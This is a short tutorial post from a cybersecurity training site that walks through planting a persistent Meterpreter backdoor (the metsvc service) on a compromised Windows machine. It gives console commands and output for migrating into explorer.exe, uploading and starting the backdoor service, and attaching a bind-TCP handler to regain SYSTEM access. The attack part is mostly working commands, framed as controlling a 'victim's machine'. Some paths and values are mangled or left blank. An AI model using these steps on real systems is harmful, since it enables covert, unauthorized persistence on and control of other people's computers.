Cybrary Pro Day is here!
Ready to Start Your Career?

Meterpreter Backdoor

Multi Thinker's profile image

By: Multi Thinker

July 14, 2015

Meterpreter Backdoor requires a script named metsvc It's a list of useful commands use to interact with a victim's machine from a backdoor.To get that script, go to:, now I assume you downloaded the script and have configured the msfconsole for it.Let's start...After our session has been started in meterpreter metasploit , we need to list the processes by typing ps:meterpreter > psIt will give a list of all running taskse.g.001 explorer.exe002 notepad.exeetc.For selecting, type migrate and then the task number 001 for explorer or other:
meterpreter > migrate 001[*] Migrating to 001...[*] Migration completed successfully.
We need to start metsvc:
meterpreter > run metsvc[*] Creating a meterpreter service on port 1337[*] Creating a temporary installation directory C:DOCUME~1ThinkerLOCALS~1TempClTpasVnksh...[*] >> Uploading metsrv.dll...[*] >> Uploading metsvc-server.exe...[*] >> Uploading metsvc.exe...[*] Starting the service...[*] * Installing service metsvc* Starting serviceService metsvc successfully installed.
For help, you can see additional options by typing:
meterpreter > run metsvc -h[*]OPTIONS:-A Automatically start a matching multi/handler to connect to the service-h This help menu-r Uninstall an existing Meterpreter service (files must be deleted manually)
We need to handle metsvc for interaction with the system. Here, we'll use tcp_bind payload from metsvc:
msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcpPAYLOAD => windows/metsvc_bind_tcp
Setting a port listener on specific local port for the local host:
msf exploit(handler) > set LPORT 31337LPORT => 31337
Target IP
msf exploit(handler) > set RHOST =>
Help and options about target:
msf exploit(handler) > show optionsModule options:Name Current Setting Required Description---- --------------- -------- -----------Payload options (windows/metsvc_bind_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique: seh, thread, processLPORT 1337 yes The local portRHOST no The target addressExploit target:Id Name-- ----0 Wildcard Target
At!!msf exploit(handler) > exploitWe've owned it. We can see any task and can interact with system.
meterpreter > pwdC:WINDOWSsystem32meterpreter > getuidServer username: ThinkerSYSTEM
Thanks and stay tuned for more.-- Multi Thinker

Want to learn more about backdoors? Start learning now by enrolling in our FREE courses:

Schedule Demo
Build your Cybersecurity or IT Career
Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry